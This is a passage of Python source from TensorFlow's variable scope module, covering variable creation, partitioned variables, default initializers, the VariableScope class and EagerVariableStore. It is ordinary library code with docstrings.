Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError(
"Passed a custom_getter which is not callable: %s" % custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
# Note: the parameters of _true_getter, and their documentation, match
# *exactly* item-for-item with the docstring of this method.
def _true_getter( # pylint: disable=missing-docstring
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
is_scalar = (shape is not None
and isinstance(shape, collections_lib.Sequence)
and not shape)
# Partitioned variable case
if partitioner is not None and not is_scalar:
if not callable(partitioner):
raise ValueError(
"Partitioner must be callable, but received: %s" % partitioner)
with ops.name_scope(None):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Special case for partitioned variable to allow reuse without having to
# specify partitioner.
if (reuse is True and partitioner is None
and name in self._partitioned_vars):
return self._get_partitioned_variable(name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=None,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# Single variable case
if "%s/part_0" % name in self._vars:
raise ValueError(
"No partitioner was provided, but a partitioned version of the "
"variable was found: %s/part_0. Perhaps a variable of the same "
"name was already created with partitioning?" % name)
return self._get_single_variable(
name=name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
# Set trainable value based on synchronization value.
trainable = _get_trainable_value(
synchronization=synchronization, trainable=trainable)
if custom_getter is not None:
# Handle backwards compatibility with getter arguments that were added
# to the API after users started writing custom getters.
custom_getter_kwargs = {
"getter": _true_getter,
"name": name,
"shape": shape,
"dtype": dtype,
"initializer": initializer,
"regularizer": regularizer,
"reuse": reuse,
"trainable": trainable,
"collections": collections,
"caching_device": caching_device,
"partitioner": partitioner,
"validate_shape": validate_shape,
"use_resource": use_resource,
"synchronization": synchronization,
"aggregation": aggregation,
}
# `fn_args` and `has_kwargs` can handle functions, `functools.partial`,
# `lambda`.
if ("constraint" in function_utils.fn_args(custom_getter) or
function_utils.has_kwargs(custom_getter)):
custom_getter_kwargs["constraint"] = constraint
return custom_getter(**custom_getter_kwargs)
else:
return _true_getter(
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
name,
partitioner,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets or creates a sharded variable list with these parameters.
The `partitioner` must be a callable that accepts a fully defined
`TensorShape` and returns a sequence of integers (the `partitions`).
These integers describe how to partition the given sharded `Variable`
along the given dimension. That is, `partitions[1] = 3` means split
the `Variable` into 3 shards along dimension 1. Currently, sharding along
only one axis is supported.
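    For instance (an illustrative sketch), a partitioner that always splits
    dimension 0 into two shards could be written as
    `lambda shape, dtype: [2] + [1] * (shape.ndims - 1)`.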
If the list of variables with the given name (prefix) is already stored,
we return the stored variables. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If the initializer is a callable, then it will be called for each
shard. Otherwise the initializer should match the shape of the entire
sharded Variable, and it will be sliced accordingly for each shard.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: the name of the new or existing sharded variable.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and `dtype` of the Variable to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
shape: shape of the new or existing sharded variable.
dtype: type of the new or existing sharded variable
(defaults to `DT_FLOAT`).
initializer: initializer for the sharded variable.
regularizer: a (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation
of variables.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`).
collections: List of graph collections keys to add the Variable to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the Variable reside, to
deduplicate copying through `Switch` and other conditional statements.
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates an
experimental ResourceVariable which has well-defined semantics. Defaults
to False (will later change to True).
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
Returns:
A `PartitionedVariable` object.
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
when violating reuse during variable creation, or if an existing
sharded variable exists for the given name but with different sharding.
"""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
initializing_from_value = initializer is not None and isinstance(
initializer, ops.Tensor)
reuse_without_partition = reuse and not partitioner
if name in self._vars:
raise ValueError(
"A partitioner was provided, but an unpartitioned version of the "
"variable was found: %s. Perhaps a variable of the same name was "
"already created without partitioning?" % name)
shape = tensor_shape.as_shape(shape)
if initializing_from_value:
shape = shape.merge_with(initializer.get_shape())
if not reuse_without_partition:
if not shape.is_fully_defined():
raise ValueError("Shape of a new partitioned variable (%s) must be "
"fully defined, but instead was %s." % (name, shape))
if shape.ndims < 1:
raise ValueError("A partitioned Variable must have rank at least 1, "
"shape: %s" % shape)
partitions = partitioner(shape=shape, dtype=dtype)
if not isinstance(partitions, collections_lib.Sequence):
raise ValueError("Partitioner must return a sequence, but saw: %s"
% partitions)
if len(partitions) != shape.ndims:
raise ValueError(
"Partitioner returned a partition list that does not match the "
"Variable's rank: %s vs. %s" % (partitions, shape))
if any([p < 1 for p in partitions]):
raise ValueError(
"Partitioner returned zero partitions for some axes: %s" %
partitions)
if name in self._partitioned_vars:
if reuse is False:
raise ValueError(
"Partitioned variable with name %s already exists. Did you mean to "
"set reuse=True or reuse=tf.AUTO_REUSE in VarScope?"
% name)
existing_var = self._partitioned_vars[name]
if not shape.is_compatible_with(existing_var.get_shape()):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified shape %s "
"and found shape %s."
% (name, shape, existing_var.get_shape()))
if not dtype.is_compatible_with(existing_var.dtype):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified dtype %s "
"and found dtype %s."
% (name, dtype.name, existing_var.dtype.name))
# pylint: disable=protected-access
if (not reuse_without_partition and
existing_var._get_partitions() != partitions):
raise ValueError(
"Trying to reuse partitioned variable %s, but specified partitions "
"%s and found partitions %s." %
(name, partitions, existing_var._get_partitions()))
# pylint: enable=protected-access
return existing_var
if reuse is True:
raise ValueError("PartitionedVariable %s does not exist, or was not "
"created with tf.get_variable(). Did you mean to set "
"reuse=False or reuse=tf.AUTO_REUSE in VarScope?" % name)
slice_dim, slice_shape = _compute_slice_dim_and_shape(
shape.as_list(), partitions)
vs = []
num_slices = partitions[slice_dim]
num_slices_with_excess = shape.dims[slice_dim].value % num_slices
slice_offset = [0] * shape.ndims
if "%s/part_0" % name in self._vars:
if "%s/part_%d" % (name, num_slices - 1) not in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but %s/part_%d was not."
% (num_slices, name, name, num_slices - 1))
if "%s/part_%d" % (name, num_slices) in self._vars:
raise ValueError(
"Partitioner returned a different partitioning than what was "
"already found. Partitioner returned %d shards, and shard "
"%s/part_0 was found, but so was the extra shard %s/part_%d."
% (num_slices, name, name, num_slices))
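    # The first `num_slices_with_excess` shards each get one extra element
    # along `slice_dim`, so the shard sizes sum exactly to the full dimension.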
for i in xrange(num_slices):
var_shape = slice_shape[:]
var_offset = slice_offset[:]
partition_info = _PartitionInfo(
full_shape=shape.as_list(), var_offset=var_offset)
if i < num_slices_with_excess:
var_shape[slice_dim] += 1
slice_offset[slice_dim] += var_shape[slice_dim]
var_full_name = "%s/part_%d" % (name, i)
with ops.name_scope(var_full_name + "/PartitionedInitializer"):
# Create the tensor to initialize the variable with default value.
if initializer is None:
init, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
if initializing_from_value:
init_shape = None
else:
init_shape = var_shape
elif callable(initializer):
init = initializer
init_shape = var_shape
elif isinstance(initializer, ops.Tensor):
init = array_ops.slice(initializer, var_offset, var_shape)
# Use the dtype of the given tensor.
dtype = init.dtype.base_dtype
init_shape = None
else:
init = ops.convert_to_tensor(initializer, dtype=dtype)
init = array_ops.slice(init, var_offset, var_shape)
init_shape = None
with ops.name_scope(None):
var = self._get_single_variable(
name=var_full_name,
shape=init_shape,
dtype=dtype,
initializer=init,
partition_info=partition_info,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
validate_shape=validate_shape,
use_resource=use_resource,
constraint=constraint)
# pylint: disable=protected-access
var._set_save_slice_info(variables.Variable.SaveSliceInfo(
name, shape.as_list(), var_offset, var_shape))
vs.append(var)
# pylint: enable=protected-access
# pylint: disable=protected-access
partitioned_var = variables.PartitionedVariable(name=name,
shape=shape,
dtype=dtype,
variable_list=vs,
partitions=partitions)
# pylint: enable=protected-access
self._partitioned_vars[name] = partitioned_var
return partitioned_var
def _get_single_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
partition_info=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
validate_shape=True,
use_resource=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Get or create a single Variable (e.g. a shard or entire variable).
See the documentation of get_variable above (ignore partitioning components)
for details.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
initializer: see get_variable.
regularizer: see get_variable.
partition_info: _PartitionInfo object.
reuse: see get_variable.
trainable: see get_variable.
collections: see get_variable.
caching_device: see get_variable.
validate_shape: see get_variable.
use_resource: see get_variable.
constraint: see get_variable.
synchronization: see get_variable.
aggregation: see get_variable.
Returns:
A Variable. See documentation of get_variable above.
Raises:
ValueError: See documentation of get_variable above.
"""
# Set to true if initializer is a constant.
initializing_from_value = False
if initializer is not None and not callable(initializer):
initializing_from_value = True
if shape is not None and initializing_from_value:
raise ValueError("If initializer is a constant, do not specify shape.")
dtype = dtypes.as_dtype(dtype)
shape = tensor_shape.as_shape(shape)
if name in self._vars:
# Here we handle the case when returning an existing variable.
if reuse is False:
var = self._vars[name]
err_msg = ("Variable %s already exists, disallowed."
" Did you mean to set reuse=True or "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
        # ResourceVariables don't have an op associated with them, so there is
        # no traceback to report.
if isinstance(var, resource_variable_ops.ResourceVariable):
raise ValueError(err_msg)
tb = var.op.traceback[::-1]
# Throw away internal tf entries and only take a few lines.
tb = [x for x in tb if "tensorflow/python" not in x[0]][:3]
raise ValueError("%s Originally defined at:\n\n%s" % (err_msg, "".join(
traceback.format_list(tb))))
found_var = self._vars[name]
if not shape.is_compatible_with(found_var.get_shape()):
raise ValueError("Trying to share variable %s, but specified shape %s"
" and found shape %s." % (name, shape,
found_var.get_shape()))
if not dtype.is_compatible_with(found_var.dtype):
dtype_str = dtype.name
found_type_str = found_var.dtype.name
raise ValueError("Trying to share variable %s, but specified dtype %s"
" and found dtype %s." % (name, dtype_str,
found_type_str))
return found_var
# The code below handles only the case of creating a new variable.
if reuse is True:
raise ValueError("Variable %s does not exist, or was not created with "
"tf.get_variable(). Did you mean to set "
"reuse=tf.AUTO_REUSE in VarScope?" % name)
# Create the tensor to initialize the variable with default value.
if initializer is None:
initializer, initializing_from_value = self._get_default_initializer(
name=name, shape=shape, dtype=dtype)
# Enter an init scope when creating the initializer.
with ops.init_scope():
if initializing_from_value:
init_val = initializer
variable_dtype = None
else:
# Instantiate initializer if provided initializer is a type object.
if isinstance(initializer, type(init_ops.Initializer)):
initializer = initializer(dtype=dtype)
if shape and shape.is_fully_defined():
init_val = lambda: initializer( # pylint: disable=g-long-lambda
shape.as_list(), dtype=dtype, partition_info=partition_info)
elif not tf_inspect.getargspec(initializer).args:
init_val = initializer
else:
raise ValueError("You can only pass an initializer function that "
"expects no arguments to its callable when the "
"shape is not fully defined. The given initializer "
"function expects the following args %s" %
tf_inspect.getargspec(initializer).args)
variable_dtype = dtype.base_dtype
# Create the variable.
if use_resource is None:
# Set the default value if unspecified.
use_resource = _DEFAULT_USE_RESOURCE
v = variables.VariableV1(
initial_value=init_val,
name=name,
trainable=trainable,
collections=collections,
caching_device=caching_device,
dtype=variable_dtype,
validate_shape=validate_shape,
constraint=constraint,
use_resource=use_resource,
synchronization=synchronization,
aggregation=aggregation)
if context.executing_eagerly() and self._store_eager_variables:
if collections:
ops.add_to_collections(collections, v)
else:
ops.add_to_collection(ops.GraphKeys.GLOBAL_VARIABLES, v)
if trainable:
ops.add_to_collection(ops.GraphKeys.TRAINABLE_VARIABLES, v)
if not context.executing_eagerly() or self._store_eager_variables:
# In eager mode we do not want to keep default references to Variable
# objects as this will prevent their memory from being released.
self._vars[name] = v
logging.vlog(1, "Created variable %s with shape %s and init %s", v.name,
format(shape), initializer)
# Run the regularizer if requested and save the resulting loss.
if regularizer:
with ops.colocate_with(v):
with ops.name_scope(name + "/Regularizer/"):
with ops.init_scope():
loss = regularizer(v)
if loss is not None:
if context.executing_eagerly():
v_name = "v_%s" % type(v)
loss_name = "loss_%s" % type(loss)
else:
v_name = v.name
loss_name = loss.name
logging.vlog(1, "Applied regularizer to %s and added the result %s "
"to REGULARIZATION_LOSSES.", v_name, loss_name)
ops.add_to_collection(ops.GraphKeys.REGULARIZATION_LOSSES, loss)
return v
# Initialize variable when no initializer provided
def _get_default_initializer(self, name, shape=None, dtype=dtypes.float32):
"""Provide a default initializer and a corresponding value.
Args:
name: see get_variable.
shape: see get_variable.
dtype: see get_variable.
Returns:
initializer and initializing_from_value. See get_variable above.
Raises:
ValueError: When giving unsupported dtype.
"""
del shape
# If dtype is DT_FLOAT, provide a uniform unit scaling initializer
if dtype.is_floating:
initializer = init_ops.glorot_uniform_initializer()
initializing_from_value = False
# If dtype is DT_INT/DT_UINT, provide a default value `zero`
# If dtype is DT_BOOL, provide a default value `FALSE`
elif (dtype.is_integer or dtype.is_unsigned or dtype.is_bool
or dtype == dtypes.string):
initializer = init_ops.zeros_initializer()
initializing_from_value = False
    # NOTE: do we need to support handling DT_STRING and DT_COMPLEX here?
else:
raise ValueError("An initializer for variable %s of %s is required"
% (name, dtype.base_dtype))
return initializer, initializing_from_value
# To stop regularization, use this regularizer
@tf_export("no_regularizer")
def no_regularizer(_):
"""Use this function to prevent regularization of variables."""
return None
# TODO(alive): support caching devices and partitioned variables in Eager mode.
@tf_export(v1=["VariableScope"])
class VariableScope(object):
"""Variable scope object to carry defaults to provide to `get_variable`.
Many of the arguments we need for `get_variable` in a variable store are most
easily handled with a context. This object is used for the defaults.
Attributes:
name: name of the current scope, used as prefix in get_variable.
initializer: default initializer passed to get_variable.
regularizer: default regularizer passed to get_variable.
reuse: Boolean, None, or tf.AUTO_REUSE, setting the reuse in
get_variable. When eager execution is enabled this argument is always
forced to be False.
caching_device: string, callable, or None: the caching device passed to
get_variable.
partitioner: callable or `None`: the partitioner passed to `get_variable`.
custom_getter: default custom getter passed to get_variable.
name_scope: The name passed to `tf.name_scope`.
dtype: default type passed to get_variable (defaults to DT_FLOAT).
use_resource: if False, create a normal Variable; if True create an
experimental ResourceVariable with well-defined semantics. Defaults
to False (will later change to True). When eager execution is enabled
this argument is always forced to be True.
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value
(which must have the same shape). Constraints are not safe to
use when doing asynchronous distributed training.
"""
def __init__(self,
reuse,
name="",
initializer=None,
regularizer=None,
caching_device=None,
partitioner=None,
custom_getter=None,
name_scope="",
dtype=dtypes.float32,
use_resource=None,
constraint=None):
"""Creates a new VariableScope with the given properties."""
self._name = name
self._initializer = initializer
self._regularizer = regularizer
self._reuse = reuse
self._caching_device = caching_device
self._partitioner = partitioner
self._custom_getter = custom_getter
self._name_scope = name_scope
self._dtype = dtype
self._use_resource = use_resource
self._constraint = constraint
if context.executing_eagerly():
if self._caching_device is not None:
raise NotImplementedError("Caching devices is not yet supported "
"when eager execution is enabled.")
if self._partitioner is not None:
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._reuse = AUTO_REUSE
self._use_resource = True
@property
def name(self):
return self._name
@property
def original_name_scope(self):
return self._name_scope
@property
def reuse(self):
return self._reuse
@property
def initializer(self):
return self._initializer
@property
def dtype(self):
return self._dtype
@property
def use_resource(self):
return self._use_resource
@property
def regularizer(self):
return self._regularizer
@property
def caching_device(self):
return self._caching_device
@property
def partitioner(self):
return self._partitioner
@property
def custom_getter(self):
return self._custom_getter
@property
def constraint(self):
return self._constraint
def reuse_variables(self):
"""Reuse variables in this scope."""
self._reuse = True
def set_initializer(self, initializer):
"""Set initializer for this scope."""
self._initializer = initializer
def set_dtype(self, dtype):
"""Set data type for this scope."""
self._dtype = dtype
def set_use_resource(self, use_resource):
"""Sets whether to use ResourceVariables for this scope."""
if context.executing_eagerly() and not use_resource:
raise ValueError("When eager execution is enabled, "
"use_resource cannot be set to false.")
self._use_resource = use_resource
def set_regularizer(self, regularizer):
"""Set regularizer for this scope."""
self._regularizer = regularizer
def set_caching_device(self, caching_device):
"""Set caching_device for this scope."""
if context.executing_eagerly():
raise NotImplementedError("Caching devices are not yet supported "
"when eager execution is enabled.")
self._caching_device = caching_device
def set_partitioner(self, partitioner):
"""Set partitioner for this scope."""
if partitioner and context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
self._partitioner = partitioner
def set_custom_getter(self, custom_getter):
"""Set custom getter for this scope."""
self._custom_getter = custom_getter
def get_collection(self, name):
"""Get this scope's variables."""
scope = self._name + "/" if self._name else ""
return ops.get_collection(name, scope)
def trainable_variables(self):
"""Get this scope's trainable variables."""
return self.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
def global_variables(self):
"""Get this scope's global variables."""
return self.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
def local_variables(self):
"""Get this scope's local variables."""
return self.get_collection(ops.GraphKeys.LOCAL_VARIABLES)
def get_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with this name or create a new one."""
if regularizer is None:
regularizer = self._regularizer
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if custom_getter is None:
custom_getter = self._custom_getter
if context.executing_eagerly():
reuse = False
use_resource = True
else:
if reuse is None:
reuse = self._reuse
if use_resource is None:
use_resource = self._use_resource
full_name = self.name + "/" + name if self.name else name
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# Check that `initializer` dtype and `dtype` are consistent before
# replacing them with defaults.
if (dtype is not None and initializer is not None and
not callable(initializer)):
init_dtype = ops.convert_to_tensor(initializer).dtype.base_dtype
if init_dtype != dtype:
raise ValueError("Initializer type '%s' and explicit dtype '%s' "
"don't match." % (init_dtype, dtype))
if initializer is None:
initializer = self._initializer
if constraint is None:
constraint = self._constraint
if dtype is None:
dtype = self._dtype
return var_store.get_variable(
full_name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
reuse=reuse,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
def _get_partitioned_variable(self,
var_store,
name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
constraint=None):
"""Gets an existing variable with this name or create a new one."""
if context.executing_eagerly():
raise NotImplementedError("Partitioned variables are not yet supported "
"when eager execution is enabled.")
if initializer is None:
initializer = self._initializer
if regularizer is None:
regularizer = self._regularizer
if constraint is None:
constraint = self._constraint
if caching_device is None:
caching_device = self._caching_device
if partitioner is None:
partitioner = self._partitioner
if dtype is None:
dtype = self._dtype
if use_resource is None:
use_resource = self._use_resource
if self._custom_getter is not None:
raise ValueError(
"Private access to _get_partitioned_variable is not allowed when "
"a custom getter is set. Current custom getter: %s. "
"It is likely that you're using create_partitioned_variables. "
"If so, consider instead using get_variable with a non-empty "
"partitioner parameter instead." % self._custom_getter)
if partitioner is None:
raise ValueError("No partitioner was specified")
# This allows the variable scope name to be used as the variable name if
# this function is invoked with an empty name arg, for backward
# compatibility with create_partitioned_variables().
full_name_list = []
if self.name:
full_name_list.append(self.name)
if name:
full_name_list.append(name)
full_name = "/".join(full_name_list)
# Variable names only depend on variable_scope (full_name here),
# not name_scope, so we reset it below for the time of variable creation.
with ops.name_scope(None):
# pylint: disable=protected-access
return var_store._get_partitioned_variable(
full_name, shape=shape, dtype=dtype, initializer=initializer,
regularizer=regularizer, reuse=self.reuse, trainable=trainable,
collections=collections, caching_device=caching_device,
partitioner=partitioner, validate_shape=validate_shape,
use_resource=use_resource, constraint=constraint)
# pylint: enable=protected-access
_VARSTORE_KEY = ("__variable_store",)
_VARSCOPESTORE_KEY = ("__varscope",)
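# The keys are tuples so they can never collide with user-supplied string
# collection names; keeping the stores in graph collections scopes them to the
# current default graph.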
class _VariableScopeStore(threading.local):
"""A thread local store for the current variable scope and scope counts."""
def __init__(self):
super(_VariableScopeStore, self).__init__()
self.current_scope = VariableScope(False)
self.variable_scopes_count = {}
def open_variable_scope(self, scope_name):
if scope_name in self.variable_scopes_count:
self.variable_scopes_count[scope_name] += 1
else:
self.variable_scopes_count[scope_name] = 1
def close_variable_subscopes(self, scope_name):
for k in list(self.variable_scopes_count.keys()):
if scope_name is None or k.startswith(scope_name + "/"):
self.variable_scopes_count[k] = 0
def variable_scope_count(self, scope_name):
return self.variable_scopes_count.get(scope_name, 0)
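# Since _VariableScopeStore subclasses threading.local, each thread observes
# its own current_scope and scope counts even when the same store object is
# shared through a collection.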
def get_variable_scope_store():
"""Returns the variable scope store for current thread."""
scope_store = ops.get_collection(_VARSCOPESTORE_KEY)
if not scope_store:
scope_store = _VariableScopeStore()
ops.add_to_collection(_VARSCOPESTORE_KEY, scope_store)
else:
scope_store = scope_store[0]
return scope_store
@tf_export(v1=["get_variable_scope"])
def get_variable_scope():
"""Returns the current variable scope."""
return get_variable_scope_store().current_scope
def _get_default_variable_store():
store = ops.get_collection(_VARSTORE_KEY)
if store:
return store[0]
store = _VariableStore()
ops.add_to_collection(_VARSTORE_KEY, store)
return store
@tf_contextlib.contextmanager
def with_variable_store(store):
store_collection = ops.get_collection_ref(_VARSTORE_KEY)
old = list(store_collection)
store_collection[:] = [store]
try:
yield
finally:
store_collection[:] = old
class EagerVariableStore(object):
"""Wrapper allowing functional layers to be used with eager execution.
When eager execution is enabled Variables get deleted when they go out of
scope, and are not stored in global collections by default. A lot of code
(mostly the functional layers in tf.layers) assumes that variables are kept in
a global list.
EagerVariableStore can be used in conjunction with this code to make it
eager-friendly. For example, to create a dense layer, use:
```
container = tfe.EagerVariableStore()
for input in dataset_iterator:
with container.as_default():
x = tf.layers.dense(input, name="l1")
  print(container.variables())  # Should print the variables used in the layer.
```
"""
def __init__(self, store=None):
if store is not None:
if not store._store_eager_variables: # pylint: disable=protected-access
raise ValueError("Cannot construct EagerVariableStore from a "
"VariableStore object that does not hold eager "
"variables.")
self._store = store
else:
self._store = _VariableStore()
self._store._store_eager_variables = True # pylint: disable=protected-access
def as_default(self):
return with_variable_store(self._store)
def variables(self):
return sorted(self._store._vars.values(), key=lambda x: x.name) # pylint: disable=protected-access
def trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def non_trainable_variables(self):
# pylint: disable=protected-access
return sorted([x for x in self._store._vars.values() if not x.trainable],
key=lambda x: x.name)
# pylint: enable=protected-access
def copy(self):
"""Copy this variable store and all of its contents.
Variables contained in this store will be copied over to the new variable
store, meaning that they can be modified without affecting the variables in
this store.
Returns:
A new EagerVariableStore instance containing copied variables.
"""
# pylint: disable=protected-access
new_store = EagerVariableStore()
for key, var in iteritems(self._store._vars):
# Strip device out of variable name.
try:
index = var.name.index(":")
except ValueError:
stripped_var_name = var.name
else:
stripped_var_name = var.name[:index]
# Create new variable with same value, name, and "trainable" flag.
new_var = resource_variable_ops.ResourceVariable(
var.read_value(),
name=stripped_var_name,
trainable=var.trainable)
new_store._store._vars[key] = new_var
return new_store
# pylint: enable=protected-access
# The argument list for get_variable must match arguments to get_local_variable.
# So, if you are updating the arguments, also update arguments to
# get_local_variable below.
@tf_export(v1=["get_variable"])
def get_variable(name,
shape=None,
dtype=None,
initializer=None,
regularizer=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
return get_variable_scope().get_variable(
_get_default_variable_store(),
name,
shape=shape,
dtype=dtype,
initializer=initializer,
regularizer=regularizer,
trainable=trainable,
collections=collections,
caching_device=caching_device,
partitioner=partitioner,
validate_shape=validate_shape,
use_resource=use_resource,
custom_getter=custom_getter,
constraint=constraint,
synchronization=synchronization,
aggregation=aggregation)
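# The docstring template below is instantiated twice, once for get_variable and
# once for get_local_variable; the %s placeholders carry the parts that differ.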
get_variable_or_local_docstring = ("""%s
%sThis function prefixes the name with the current variable scope
and performs reuse checks. See the
[Variable Scope How To](https://tensorflow.org/guide/variables)
for an extensive description of how reusing works. Here is a basic example:
```python
def foo():
with tf.variable_scope("foo", reuse=tf.AUTO_REUSE):
v = tf.get_variable("v", [1])
return v
v1 = foo() # Creates v.
v2 = foo() # Gets the same, existing v.
assert v1 == v2
```
If initializer is `None` (the default), the default initializer passed in
the variable scope will be used. If that one is `None` too, a
`glorot_uniform_initializer` will be used. The initializer can also be
a Tensor, in which case the variable is initialized to this value and shape.
Similarly, if the regularizer is `None` (the default), the default regularizer
passed in the variable scope will be used (if that is `None` too,
then by default no regularization is performed).
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable if one is created. Can either be
an initializer object or a Tensor. If it's a Tensor, its shape must be known
unless validate_shape is False.
regularizer: A (Tensor -> Tensor or None) function; the result of
applying it on a newly created variable will be added to the collection
`tf.GraphKeys.REGULARIZATION_LOSSES` and can be used for regularization.
%scollections: List of graph collections keys to add the Variable to.
